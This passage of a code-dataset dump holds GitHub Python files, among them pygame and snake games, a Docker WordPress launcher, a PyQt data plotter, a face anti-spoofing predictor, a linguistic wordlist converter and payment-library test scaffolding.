80:\r\n SPEED = 30\r\n else:\r\n SPEED = 50\r\n return SPEED\r\n\r\ndef update_enemy_pos(enemy_list, score):\r\n for idx, enemy_pos in enumerate(enemy_list):\r\n if enemy_pos[1] >= 0 and enemy_pos[1] < HEIGHT:\r\n enemy_pos[1] += SPEED\r\n else:\r\n enemy_list.pop(idx)\r\n score += 1\r\n return score\r\n if detect_collision(player_pos, enemy_pos):\r\n game_over = True\r\n finish = True\r\n\r\ndef collision_check(enemy_list, player_pos):\r\n for enemy_pos in enemy_list:\r\n if detect_collision(enemy_pos, player_pos):\r\n return True\r\n return False\r\n\r\ndef detect_collision(player_pos, enemy_pos):\r\n p_x = player_pos[0]\r\n p_y = player_pos[1]\r\n\r\n e_x = enemy_pos[0]\r\n e_y = enemy_pos[1]\r\n\r\n if (e_x >= p_x and e_x < (p_x + player_size)) or (p_x >= e_x and p_x < (e_x + enemy_size)):\r\n if (e_y >= p_y and e_y < (p_y + player_size)) or (p_y >= e_y and p_y < (e_y + enemy_size)):\r\n return True\r\n return False\r\n\r\n\r\n\r\ndef show_go_screen():\r\n holo = True\r\n while holo:\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n quit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n holo = False\r\n\r\n screen.fill((0,0,0))\r\n clock.tick(30)\r\n screen.blit(background2,(0, 0))\r\n text1 = \" \" + str(score)\r\n label1 = font.render(text1, 1, (255, 255, 255))\r\n screen.blit(label1, (WIDTH-445, HEIGHT- 523) )\r\n pygame.display.update()\r\n\r\nmenu = True\r\n\r\nwhile not game_over:\r\n\r\n while menu:\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n quit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n pygame.mixer.music.stop()\r\n menu = False\r\n music = pygame.mixer.music.load(\"C:/Users/DELL/Documents/Mission-Cube/data/song1.mp3\")\r\n pygame.mixer.music.play(-1)\r\n\r\n\r\n screen.fill((0,0,0))\r\n clock.tick(30)\r\n screen.blit(background1,(0, 0))\r\n pygame.display.update()\r\n\r\n\r\n\r\n for event in pygame.event.get():\r\n\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n if event.type == pygame.KEYDOWN:\r\n\r\n x = player_pos[0]\r\n y = player_pos[1]\r\n\r\n if event.key == pygame.K_LEFT and x > 40:\r\n x -= 50\r\n elif event.key == pygame.K_RIGHT and x < WIDTH - player_size - 49.5:\r\n x += 50\r\n player_pos = [x, y]\r\n\r\n\r\n\r\n screen.fill(BACKGROUND_COLOUR)\r\n\r\n drop_enemies(enemy_list)\r\n score = update_enemy_pos(enemy_list, score)\r\n\r\n SPEED = set_level(score, SPEED)\r\n\r\n text = \"Score : \" + str(score)\r\n label = font.render(text, 1, RED)\r\n screen.blit(label, (WIDTH-170, HEIGHT-40) )\r\n\r\n if collision_check(enemy_list, player_pos):\r\n game_over = True\r\n\r\n draw_enemies(enemy_list)\r\n\r\n pygame.draw.rect(screen, ORANGE, (player_pos[0], player_pos[1], player_size, player_size))\r\n\r\n clock.tick(30)\r\n\r\n pygame.display.update()\r\n\r\nif finish:\r\n pygame.mixer.music.stop()\r\n music = pygame.mixer.music.load(\"C:/Users/DELL/Documents/Mission-Cube/data/song3.mp3\")\r\n pygame.mixer.music.play(0)\r\n show_go_screen()\r\n finish = False\r\n","repo_name":"HootchGaming/Mission-Cube-Game","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19000999510","text":"import pygame\r\n\r\n\r\nclass Snake(object):\r\n # intialize all properties (the default direction towards right/the default size is 2)\r\n def __init__(self):\r\n self.dirction = pygame.K_RIGHT\r\n self.body = []\r\n for x in range(2):\r\n self.addnode()\r\n\r\n # Add cell in front of the snake\r\n def addnode(self):\r\n left, top = (0, 0)\r\n if self.body:\r\n left, top = (self.body[0].left, self.body[0].top)\r\n node = pygame.Rect(left, top, 25, 25)\r\n if self.dirction == pygame.K_LEFT:\r\n node.left -= 25\r\n elif self.dirction == pygame.K_RIGHT:\r\n node.left += 25\r\n elif self.dirction == pygame.K_UP:\r\n node.top -= 25\r\n elif self.dirction == pygame.K_DOWN:\r\n node.top += 25\r\n self.body.insert(0, node)\r\n\r\n # Delete all cell\r\n def delnode(self):\r\n self.body.pop()\r\n\r\n # how to die\r\n def isdead(self, size_x, size_y):\r\n # when to hit the wall\r\n if self.body[0].x not in range(size_x):\r\n return True\r\n if self.body[0].y not in range(size_y):\r\n return True\r\n # when the snake hits itself\r\n if self.body[0] in self.body[1:]:\r\n return True\r\n return False\r\n\r\n # Move!\r\n def move(self):\r\n self.addnode()\r\n self.delnode()\r\n\r\n # change direction\r\n def changedirection(self, curkey):\r\n LR = [pygame.K_LEFT, pygame.K_RIGHT]\r\n UD = [pygame.K_UP, pygame.K_DOWN]\r\n if curkey in LR + UD:\r\n if (curkey in LR) and (self.dirction in LR):\r\n return\r\n if (curkey in UD) and (self.dirction in UD):\r\n return\r\n self.dirction = curkey","repo_name":"JiaoyangXu/GreedySnake","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14399985846","text":"import subprocess\nimport sys\n# Function made to check if Docker compose is installed or not and if not it will install\ndef check_docker():\n try:\n subprocess.run([\"docker\", \"--version\"], check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n print(\"Docker is installed.\")\n except FileNotFoundError:\n print(\"Docker is not installed.\")\n\ndef create_wordpress_site(site_name):\n try:\n subprocess.run([\"docker\", \"run\", \"-d\", \"--name\", site_name, \"-p\", \"8080:80\", \"-v\", f\"{site_name}:/var/www/html\", \"wordpress:latest\"])\n subprocess.run([\"docker\", \"exec\", site_name, \"chown\", \"-R\", \"www-data:www-data\", \"/var/www/html\"])\n print(\"WordPress site created successfully!\")\n print(f\"Access your site at http://localhost:8080/{site_name}\")\n except subprocess.CalledProcessError as e:\n print(f\"Error creating the WordPress site: {e}\")\n\n\ndef stop_wordpress_site(site_name):\n try:\n subprocess.run([\"docker\", \"stop\", site_name])\n print(\"WordPress site stopped successfully!\")\n except subprocess.CalledProcessError as e:\n print(f\"Error stopping the WordPress site: {e}\")\n\ndef start_wordpress_site(site_name):\n try:\n subprocess.run([\"docker\", \"start\", site_name])\n print(\"WordPress site started successfully!\")\n except subprocess.CalledProcessError as e:\n print(f\"Error starting the WordPress site: {e}\")\n\n\ndef main():\n print(\"Checking Docker installation...\")\n check_docker()\n if len(sys.argv) < 2:\n print(\"Please provide the site name as a command-line argument.\")\n print(\"Usage: python3 create_wordpress.py \")\n sys.exit(1)\n\n subcommand = sys.argv[1]\n site_name = sys.argv[2]\n \n if subcommand == \"create\":\n create_wordpress_site(site_name)\n elif subcommand == \"stop\":\n stop_wordpress_site(site_name)\n elif subcommand == \"start\":\n start_wordpress_site(site_name)\n else:\n print(\"Invalid subcommand.\")\n print(\"Available subcommands: create, stop, start\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Niku2420/RT-Camp-Assignmnet","sub_path":"pythonScript.py","file_name":"pythonScript.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40940900507","text":"import os\nimport datetime\n\nfrom peewee import *\n\nfrom common import *\nimport settings\nfrom model.basic_contract_random_name import BasicContractRandomName\n\nclass SymbolRandom:\n def createRandomSymbolOnceTime(self):\n print(\"running createRandomSymbolOnceTime\")\n names = GetSymbolName()\n idx = 1\n for name in names:\n self._saveData(name)\n idx = idx +1\n # print(idx)\n \n def _saveData(self,name):\n #cursor = settings.db.cursor()\n try:\n BasicContractRandomName.create(name=name,\n last_update_date=datetime.datetime.now())\n # time = datetime.datetime.now()\n # sql = \"insert into basic_contract_random_name( \\\n # name, last_update_date) \\\n # values ('%s','%s') \" % \\\n # (name,time)\n # cursor.execute(sql)\n # settings.db.commit()\n except Exception as e:\n print(e)\n #settings.db.rollback()","repo_name":"wins1978/ib_source","sub_path":"once_tasks/symbol_random.py","file_name":"symbol_random.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13574610524","text":"from SendReceive import filename2\r\nimport threading # 导入线程模块\r\nfrom PyQt5 import QtWidgets, QtCore\r\nfrom PyQt5.QtCore import QTimer, QThread, pyqtSignal,QObject\r\nfrom PyQt5.QtWidgets import QApplication\r\nimport time\r\n\r\nimport os\r\n\r\nimport struct\r\nimport pyqtgraph.opengl as gl\r\nimport pyqtgraph as pg\r\nimport numpy as np\r\n\r\n\r\nclass ReadThread(QtCore.QThread):\r\n # 通过类成员对象定义信号对象\r\n signal = pyqtSignal(str)\r\n\r\n def __init__(self):\r\n super(ReadThread, self).__init__()\r\n\r\n def __del__(self):\r\n self.wait()\r\n\r\n def run(self):\r\n for i in range(100):\r\n time.sleep(0.2)\r\n self.signal.emit(str(i)) # 注意这里与_signal = pyqtSignal(str)中的类型相同\r\n print(threading.current_thread(), time.ctime(time.time()), 'run时间')\r\n\r\n\r\ndef fdaq_changename(self):\r\n name = filename2\r\n time0 = int(self.ui.lineEdit_16.text())#设置文件命的开始\r\n cycle = int(self.ui.lineEdit_18.text())#设置文件名的结束\r\n t1 = threading.Thread(target=writefile, args=[time0,cycle,]) # 写dat线程\r\n t1.setDaemon(True)\r\n t1.start()\r\n t2 = threading.Thread(target=dattotxt, args=[time0, cycle, ]) # dat-txt线程\r\n t2.setDaemon(True)\r\n t2.start()\r\n t3 = threading.Thread(target=alldatafile, args=[time0, cycle, ]) # dat-txt线程\r\n t3.setDaemon(True)\r\n t3.start()\r\n\r\n '''self.t4 = ReadThread()\r\n self.t4.signal.connect(lambda: self.plottxt0) # 画图plottxt\r\n self.t4.start()\r\n self.t4.quit()\r\n self.t4.wait()'''\r\n plottxt(self)\r\n print('over')\r\n print(threading.current_thread(), time.ctime(time.time()), '主线程和时间')\r\n\r\ndef stop():\r\n print('stop')\r\n#模仿fdaq创建dat文件\r\ndef writefile(time0 = 9,cycle = 0):\r\n x = 11\r\n y = 12\r\n z = 13\r\n a = 0.11111111111\r\n for i in range(cycle,time0):\r\n name = ''.join(filename2)\r\n rename = list(name)\r\n rename[-5] = str(i)\r\n name = ''.join(rename)\r\n with open(name,'wb') as f:\r\n s = struct.pack('iiid',x,y,z,a) #i是整数,d是double精度\r\n f.write(s)\r\n x += x\r\n y += y\r\n z += z\r\n time.sleep(10)#每十秒生成一个dat文件\r\n print(threading.current_thread(), time.ctime(time.time()), '线程1')\r\n f = open(name, 'rb')\r\n cont = f.read()\r\n cont1 = struct.unpack('iiid',cont)\r\n f.close()\r\n\r\n\r\n#dat转txt文件的线程\r\ndef dattotxt(time0 = 9,cycle = 0):\r\n for i in range(cycle,time0):\r\n name = ''.join(filename2)\r\n rename = list(name)\r\n rename[-5] = str(i)\r\n name = ''.join(rename)\r\n time.sleep(11)\r\n with open(name, 'rb') as datfile:\r\n data0 = datfile.read()\r\n data = struct.unpack('iiid',data0)\r\n name = ''.join(filename2)\r\n rename = list(name)\r\n rename[-5] = str(i)\r\n rename[-3] = 't'\r\n rename[-2] = 'x'\r\n name = ''.join(rename)\r\n txtfile = open(name, 'a+')\r\n data1 = str(' '.join(map(str, data)))\r\n txtfile.write(data1)\r\n txtfile.close()\r\n print(threading.current_thread(), time.ctime(time.time()), '线程2')\r\n\r\n\r\n\r\ndef alldatafile(time0 = 9,cycle = 0):\r\n for i in range(cycle, time0):\r\n name = ''.join(filename2)\r\n rename = list(name)\r\n rename[-5] = str(i)\r\n rename[-3] = 't'\r\n rename[-2] = 'x'\r\n name = ''.join(rename)\r\n time.sleep(12)\r\n with open(name, 'r') as datfile:\r\n data = datfile.read()\r\n name = ''.join(filename2)\r\n rename = list(name)\r\n rename[-5] = 't'\r\n rename[-3] = 't'\r\n rename[-2] = 'x'\r\n name = ''.join(rename)\r\n txtfile = open(name, 'a+')\r\n txtfile.write(data + '\\n')\r\n txtfile.close()\r\n print('over')\r\n\r\ndef plottxt0(self, msg):\r\n print('33333')\r\n self.ui.progressBar_2.setValue(int(msg))\r\n\r\n\r\ndef plottxt(self):\r\n plot_plt1 = gl.GLViewWidget() # 实例化一个绘图部件\r\n plot_plt2 = gl.GLViewWidget()\r\n plot_plt3 = gl.GLViewWidget()\r\n # self.ui.plot_plt.showGrid(x=True, y=True) # 显示图形网格\r\n self.ui.gridLayout_10.addWidget(plot_plt1, 0, 0, 1, 1)\r\n self.ui.gridLayout_10.addWidget(plot_plt2, 0, 1, 2, 2)\r\n self.ui.gridLayout_10.addWidget(plot_plt3, 1, 0, 1, 1)\r\n # 添加绘图部件到线图部件的网格布局层\r\n # 将上述部件添加到布局层中\r\n # W.setWindowTitle('pyqtgraph example: GLScatterPlotItem')\r\n plot_plt1.opts['distance'] = 150\r\n plot_plt2.opts['distance'] = 200\r\n plot_plt3.opts['distance'] = 200\r\n plot_plt1.opts['elevation'] = 0\r\n plot_plt2.opts['elevation'] = 30\r\n plot_plt3.opts['elevation'] = -90\r\n gx = gl.GLGridItem()\r\n gy = gl.GLGridItem()\r\n gz = gl.GLGridItem()\r\n gx.setSize(100, 100, 100)\r\n gx.setSpacing(10, 10, 10)\r\n gx.rotate(90, 0, 1, 0)\r\n gx.translate(0, 50, 50)\r\n gy.setSize(100, 100, 100)\r\n gy.setSpacing(10, 10, 10)\r\n gy.rotate(90, 1, 0, 0)\r\n gy.translate(50, 0, 50)\r\n gz.setSize(100, 100, 100)\r\n gz.setSpacing(10, 10, 10)\r\n gz.translate(50, 50, 0)\r\n plot_plt1.addItem(gx)\r\n plot_plt2.addItem(gx)\r\n plot_plt3.addItem(gx)\r\n plot_plt1.addItem(gy)\r\n plot_plt2.addItem(gy)\r\n plot_plt3.addItem(gy)\r\n plot_plt1.addItem(gz)\r\n plot_plt2.addItem(gz)\r\n plot_plt3.addItem(gz)\r\n name = ''.join(filename2)\r\n rename = list(name)\r\n rename[-5] = 't'\r\n rename[-3] = 't'\r\n rename[-2] = 'x'\r\n name = ''.join(rename)\r\n print(name)\r\n timebar = 0\r\n while not os.access(name, os.R_OK):\r\n print('no file')\r\n QApplication.processEvents()\r\n time.sleep(1)\r\n if os.access(name, os.F_OK):\r\n x, y, z, r = [], [], [], []\r\n with open(name) as file_object:\r\n lines = file_object.readlines()\r\n for line in lines:\r\n # print(line.rstrip())\r\n TX = line.split(' ' or '\\n')\r\n x.append(float(TX[0]))\r\n y.append(float(TX[1]))\r\n z.append(float(TX[2]))\r\n r.append(float(TX[3]))\r\n l = len(r)\r\n print('总数据个数: ',len(r))\r\n r = np.array(r)\r\n mask1 = -0.02 > r\r\n mask2 = 0.02 < r\r\n mask = mask1 + mask2\r\n x = np.array(x)\r\n y = np.array(y)\r\n z = np.array(z)\r\n x = x[mask]\r\n y = y[mask]\r\n z = z[mask]\r\n x = list(x)\r\n y = list(y)\r\n z = list(z)\r\n #l = len(x)\r\n print('有效数据个数: ',len(x), len(y), len(z))\r\n pos = np.empty((l, 3))\r\n po = list(zip(x, y, z))\r\n p = np.array(po)\r\n size = np.empty((l))\r\n size[:] = 1\r\n color = np.empty((l, 4))\r\n color[:] = (1.0, 0.6, 0.0, 0.5)\r\n size[:] = self.ui.horizontalSlider.value() / 10\r\n color[:] = (1.0, 0.6, 0.0, self.ui.horizontalScrollBar.value() / 100)\r\n sp1 = gl.GLScatterPlotItem(pos=p, size=size, color=color, pxMode=False)\r\n plot_plt1.addItem(sp1)\r\n plot_plt2.addItem(sp1)\r\n plot_plt3.addItem(sp1)\r\n print(threading.currentThread(), time.ctime(time.time()), '3')\r\n QApplication.processEvents()\r\n\r\n while os.access(name, os.F_OK):\r\n X, Y, Z, R = [], [], [], []\r\n with open(name) as file_object:\r\n lines = file_object.readlines()\r\n for line in lines:\r\n # print(line.rstrip())\r\n TX = line.split(' ' or '\\n')\r\n X.append(float(TX[0]))\r\n Y.append(float(TX[1]))\r\n Z.append(float(TX[2]))\r\n R.append(float(TX[3]))\r\n print(len(R),'R长度')\r\n print(len(r),'r长度')\r\n if len(r) == len(R):\r\n print('进入=')\r\n for i in range(0,1500):\r\n QApplication.processEvents()\r\n time.sleep(0.01)\r\n timebar +=1\r\n\r\n elif len(R) > len(r):\r\n print('进入>')\r\n plot_plt2.items.remove(sp1)\r\n timebar =0\r\n L = len(R)\r\n r = np.array(R)\r\n mask1 = -0.02 > r\r\n mask2 = 0.02 < r\r\n mask = mask1 + mask2\r\n X = np.array(X)\r\n Y = np.array(Y)\r\n Z = np.array(Z)\r\n X = X[mask]\r\n Y = Y[mask]\r\n Z = Z[mask]\r\n X = list(X)\r\n Y = list(Y)\r\n Z = list(Z)\r\n L = len(X)\r\n print('有效数据的个数: ', len(X), len(Y), len(Z))\r\n pos = np.empty((l, 3))\r\n po = list(zip(X, Y, Z))\r\n p = np.array(po)\r\n print(p)\r\n #d = (p ** 2).sum(axis=1) ** 0.5\r\n size = np.empty((L))\r\n size[:] = 1\r\n color = np.empty((L, 4))\r\n color[:] = (1.0, 0.6, 0.0, 0.5)\r\n size[:] = self.ui.horizontalSlider.value() / 10\r\n color[:] = (1.0, 0.6, 0.0, self.ui.horizontalScrollBar.value() / 100)\r\n sp1 = gl.GLScatterPlotItem(pos=p, size=size, color=color, pxMode=False)\r\n plot_plt1.addItem(sp1)\r\n plot_plt2.addItem(sp1)\r\n plot_plt3.addItem(sp1)\r\n print(threading.currentThread(), time.ctime(time.time()), '3')\r\n QApplication.processEvents()\r\n\r\n else:\r\n print('wrong')\r\n\r\n if timebar == 2:\r\n print('没了')\r\n break\r\n\r\n\r\n\r\n'''直接使用师兄给的文件\r\nfilename2 = 'C:\\\\Users\\\\obigo\\\\Desktop\\\\fec_mpgd_ws_334w_al_20191211_0-0DD.dat'\r\nfilename1 = 'C:/Users/obigo/Desktop/222222.dat'\r\nstrb = '中国'\r\ndef writedat():\r\n i = 0\r\n with open(filename2,'rb') as fileobject:\r\n contents = fileobject.read()\r\n print(type(contents))\r\n with open(filename1, mode='wb', buffering=-1, encoding=None, errors=None, newline=None, closefd=True, opener=None) as fileobject:\r\n fileobject.write(contents)\r\n #f = open(filename2,'r')\r\n #f.close()\r\n\r\nwritedat()\r\n'''","repo_name":"obigozw/Muon-Tomography-Software-Design","sub_path":"PyQt5/createdat.py","file_name":"createdat.py","file_ext":"py","file_size_in_byte":10112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2585379358","text":"import os\nimport torch \nfrom src.utils import parse_model_name , get_kernel\nimport torch.nn.functional as F\nfrom src.models.MiniFASNet import MiniFASNetV2,MiniFASNetV1SE\nfrom src.transformers import transform as trans\nMODEL_MAPPING = {\n 'MiniFASNetV2': MiniFASNetV2,\n 'MiniFASNetV1SE':MiniFASNetV1SE,\n}\nclass AntiSpoofPredict():\n def __init__(self, device_id):\n super(AntiSpoofPredict, self).__init__()\n self.device = torch.device(\"cuda:{}\".format(device_id)\n if torch.cuda.is_available() else \"cpu\")\n def _load_model(self, model_path):\n model_name = os.path.basename(model_path)\n h_input, w_input, model_type, _ = parse_model_name(model_name)\n self.kernel_size = get_kernel(h_input, w_input,)\n self.model = MODEL_MAPPING[model_type](conv6_kernel=self.kernel_size).to(self.device)\n state_dict = torch.load(model_path, map_location=self.device)\n keys = iter(state_dict)\n first_layer_name = keys.__next__()\n if first_layer_name.find('module.') >= 0:\n from collections import OrderedDict\n new_state_dict = OrderedDict()\n for key, value in state_dict.items():\n name_key = key[7:]\n new_state_dict[name_key] = value\n self.model.load_state_dict(new_state_dict)\n else:\n self.model.load_state_dict(state_dict)\n return None\n\n def predict(self, img,model_path):\n test_transform = trans.Compose([\n trans.ToTensor(),\n ])\n img = test_transform(img)\n img = img.unsqueeze(0).to(self.device)\n self._load_model(model_path)\n self.model.eval()\n with torch.no_grad():\n result = self.model.forward(img)\n result = F.softmax(result).cpu().numpy()\n return result","repo_name":"Ali-Fayzi/anti-spoofing","sub_path":"src/anti_spoofing_predict.py","file_name":"anti_spoofing_predict.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73705581314","text":"\nfrom typing import NamedTuple, List\nfrom fuzzysearch import find_near_matches\n\nfrom flat_crawler import constants as ct\n\n\n\n\nclass Pattern(NamedTuple):\n key: str # type of info we want to extract\n word: str\n max_dist: int = 0\n lower: bool = False\n\n\nPATTERNS = [\n Pattern(key=ct.KAMIENICA_KEY, word='kamienicy', max_dist=1, lower=True),\n Pattern(key=ct.KAMIENICA_KEY, word='kamienica', max_dist=1, lower=True),\n Pattern(key=ct.MODERN_KEY, word='apartamentowiec', max_dist=1, lower=True),\n Pattern(key=ct.DEVELOPER_KEY, word='deweloper', max_dist=1, lower=True),\n Pattern(key=ct.DEVELOPER_KEY, word='developer', max_dist=1, lower=True),\n Pattern(key=ct.BALCONY_KEY, word='balkon', max_dist=0, lower=True),\n Pattern(key=ct.BALCONY_KEY, word='balkonem', max_dist=0, lower=True),\n Pattern(key=ct.BALCONY_KEY, word='loggia', max_dist=1, lower=True),\n Pattern(key=ct.FRENCH_BALCONY_KEY, word='balkon francuski', max_dist=3, lower=True),\n]\n\nLOCATION_PATTERNS = [\n Pattern(key=ct.LOCATION_KEY, word=word, max_dist=0, lower=True) for word in [\n 'obok', 'przy', 'niedaleko', 'zlokalizowane', 'położone', 'w okolicy', 'na', 'ul.',\n 'ulicy', 'placu',\n ]\n]\n\n\ndef extract_keys_from_text(text: str, patterns=PATTERNS):\n non_lower_pat = [p for p in patterns if not p.lower]\n lower_pat = [p for p in patterns if p.lower]\n keys = set()\n all_matches = []\n lower_text = text.lower()\n for patt in non_lower_pat + lower_pat:\n if patt.lower:\n txt = lower_text\n word = patt.word.lower()\n else:\n txt = text\n word = patt.word\n if not word:\n continue\n matches = find_near_matches(word, txt, max_l_dist=patt.max_dist)\n if matches:\n keys.add(patt.key)\n all_matches.extend(matches)\n return list(keys), [(m.start, m.end) for m in all_matches]\n\n\ndef phrase_in_text(phrase: str, text: str):\n return [(m.start, m.end) for m in find_near_matches(phrase, text, max_l_dist=0)]\n","repo_name":"Buzdygan/flats","sub_path":"m3/flat_crawler/utils/extract_info.py","file_name":"extract_info.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13509784083","text":"from lingpy import *\nfrom collections import defaultdict\n\ndef parse_thiago(string):\n strings = ['']\n for char in string:\n strings[-1] += char\n if char == '}':\n strings += ['']\n \n dsets = []\n for string in strings:\n current = ''\n bcount = 0\n data = {}\n for char in string:\n if char == '$':\n if not current:\n current = 'form'\n data[current] = ''\n else:\n current = ''\n elif char == '/':\n if not current:\n current = 'phonemic'\n data[current] = ''\n elif current == 'phonemic':\n current = ''\n else:\n data[current] += char\n elif char == '{':\n current = 'source'\n data[current] = ''\n elif char == '}':\n current = ''\n elif char == '<':\n current = 'value'\n data[current] = ''\n elif char == '(':\n bcount += 1\n if not current:\n current = 'spanish'\n data[current] = ''\n elif current == 'spanish':\n data[current] += char\n else:\n data[current] += char\n elif char == '<':\n current = 'value'\n data[current] = ''\n elif char == '>':\n current = ''\n elif char == ')':\n bcount -= 1\n if current == 'spanish' and bcount == 0:\n current = ''\n elif current == 'spanish':\n data[current] += char\n else:\n data[current] += char\n elif current:\n data[current] += char\n dsets += [data]\n return dsets\n\n\ncsv = csv2list('raw/compiled_750.tsv', strip_lines=False, comment='>>>')\nheader = csv[0][5:]\nD = {0: [\n 'doculect', \n 'concept', \n 'concept_spanish',\n 'concept_french',\n 'concept_portuguese',\n 'semantic_field',\n 'value_in_source', \n 'value',\n 'form1', 'form2', 'form', 'segments', 'source']}\nidx = 1\nconcepts = []\ncmaps = {}\nfor i, line in enumerate(csv[1:]):\n concept = line[0]\n spanish = line[1]\n french = line[2]\n port = line[3]\n rest = line[5:]\n cmaps[port] = concept\n semfield = line[4]\n concepts += [(str(i+1), concept, spanish, french, port, semfield)]\n for language, cell in zip(header, rest):\n print(cell)\n datapoints = parse_thiago(cell)\n for data in [x for x in datapoints if x]:\n form = data.get('phonemic', \n data.get('form', data.get('value', '')))\n if form:\n segments = ' '.join(ipa2tokens(form.replace(' ','_'), \n merge_vowels=False,\n semi_diacritics = 'hsʃzʒ'))\n new_line = [language, concept, \n spanish,\n french,\n port,\n semfield,\n cell, \n data.get('value', ''), data.get('form', ''),\n data.get('phonemic', ''), form, segments, data.get('source')]\n D[idx] = [str(x) for x in new_line]\n idx += 1\n\n\ncsv = csv2list('raw/Baniwa_only_750', strip_lines=False)\nfor i, line in enumerate(csv[1:]):\n port = line[0]\n rest = [line[1]]\n concept = cmaps.get(port, '?')\n language = 'Baniwa'\n for cell in rest:\n print(cell)\n datapoints = parse_thiago(cell)\n for data in [x for x in datapoints if x]:\n form = data.get('phonemic', \n data.get('form', data.get('value', '')))\n if form:\n segments = ' '.join(ipa2tokens(form.replace(' ','_'), \n merge_vowels=False,\n semi_diacritics = 'hsʃzʒ'))\n new_line = [language, concept, \n '',\n '',\n port,\n '',\n cell, \n data.get('value', ''), data.get('form', ''),\n data.get('phonemic', ''), form, segments, data.get('source')]\n D[idx] = [str(x) for x in new_line]\n idx += 1\n\n\nwl = Wordlist(D)\n\ncounts = defaultdict(lambda: defaultdict(list))\nproblematic = {}\nfor k, val, lang in iter_rows(wl, 'form', 'doculect'):\n try:\n tks = ipa2tokens(val, semi_diacritics='shzʃʒʂʐɕʑ', merge_vowels=False)\n cls = tokens2class(tks, 'dolgo')\n for t, c in zip(tks, cls):\n counts[lang][t, c] += [val]\n problematic[k] = ''\n except: \n problematic[k] = '!'\n\nfor lang, vals in counts.items():\n with open(lang+'.orthography.tsv', 'w') as f:\n f.write('Grapheme\\tIPA\\tFREQUENCY\\tEXAMPLE\\n')\n for (t, c), lst in sorted(counts[lang].items(), key=lambda x: len(x[1]),\n reverse=True):\n if c != '0':\n cpart = t\n else:\n cpart = ''\n print(t, c, lst)\n f.write('{0}\\t{1}\\t{2}\\t{3}\\n'.format(\n t, cpart, len(lst), lst[0]))\n\nwl.add_entries('problematic', problematic, lambda x: x)\nlex = LexStat(wl, segments='segments')\n#lex.get_scorer()\nlex.cluster(method='sca', threshold=0.45, ref='cogid')\nlex.output('tsv', filename='wordlist-750', ignore='all', prettify=False,\n subset=True, cols=['doculect', 'concept', \n 'concept_spanish',\n 'concept_french',\n 'concept_portuguese',\n 'semantic_field',\n 'value_in_source', 'value',\n 'form1', 'form2', 'form', 'segments', 'source', 'cogid', 'problematic'])\n\n\nwith open('concepts.tsv', 'w') as f:\n f.write('NUMBER\\tENGLISH\\tSPANISH\\tFRENCH\\tPORTUGUESE\\tSEMANTIC_FIELD\\n')\n for line in concepts:\n f.write('\\t'.join(line)+'\\n')\n \n\n\n","repo_name":"thiagochacon/Northern_Arawak","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":6129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23614492141","text":"from sys import argv, exit\n\nif len(argv) < 3:\n exit(\"Not enough arguments\")\n\ninput_file = argv[1]\noutput_file = argv[2]\n\n\n\nwith open(output_file, 'w') as out_desc:\n in_desc = open(input_file)\n num_cases = int(in_desc.readline().strip())\n for t in xrange(num_cases):\n parts = in_desc.readline().split()\n\n status = {'O': (1,0), 'B': (1,0)}\n\n count = 0\n\n N = int(parts[0])\n i = 1\n for _ in xrange(N):\n color = parts[i]\n button = int(parts[i+1])\n i += 2\n\n distance = abs(button-status[color][0])\n time = count-status[color][1]\n\n count += max(0, distance-time) + 1\n status[color] = (button,count)\n\n\n\n\n\n print >> out_desc, \"Case #%d: %s\" % (t+1,count)","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_74/476.py","file_name":"476.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12339687885","text":"\"\"\"Tests for the conversions module.\"\"\"\n# pylint: disable=protected-access\n\nfrom datetime import date, time\nfrom decimal import Decimal\nfrom unittest.mock import patch\n\nfrom helcim import conversions\n\n# *_API_FIELDS being mocked to allow proper testing of validation\nMOCK_TO_FIELDS_DECIMAL = {\n 'amount': conversions.Field('amount', 'c', 10, 100),\n}\n\nMOCK_TO_FIELDS_STRING = {\n 'cc_cvv': conversions.Field('cardCVV', 's', 3, 4),\n}\n\nMOCK_TO_FIELDS_INTEGER = {\n 'product_id': conversions.Field('productId', 'i', 1, 100),\n}\n\nMOCK_TO_FIELDS_BOOLEAN = {\n 'test': conversions.Field('test', 'b'),\n}\n\nMOCK_TO_FIELDS_ALL = {\n 'amount': conversions.Field('amount', 'c', 10, 100),\n 'cc_cvv': conversions.Field('cardCVV', 's', 3, 4),\n 'product_id': conversions.Field('productId', 'i', 1, 100),\n 'test': conversions.Field('test', 'b'),\n}\n\nMOCK_TO_FIELDS_INVALID = {\n 'invalid': conversions.Field('value', 't'),\n}\n\nMOCK_FROM_FIELDS = {\n 'amount': conversions.Field('amount', 'c'),\n 'cardNumber': conversions.Field('cc_number', 's'),\n 'transactionId': conversions.Field('transaction_id', 'i'),\n 'availability': conversions.Field('availability', 'b'),\n 'date': 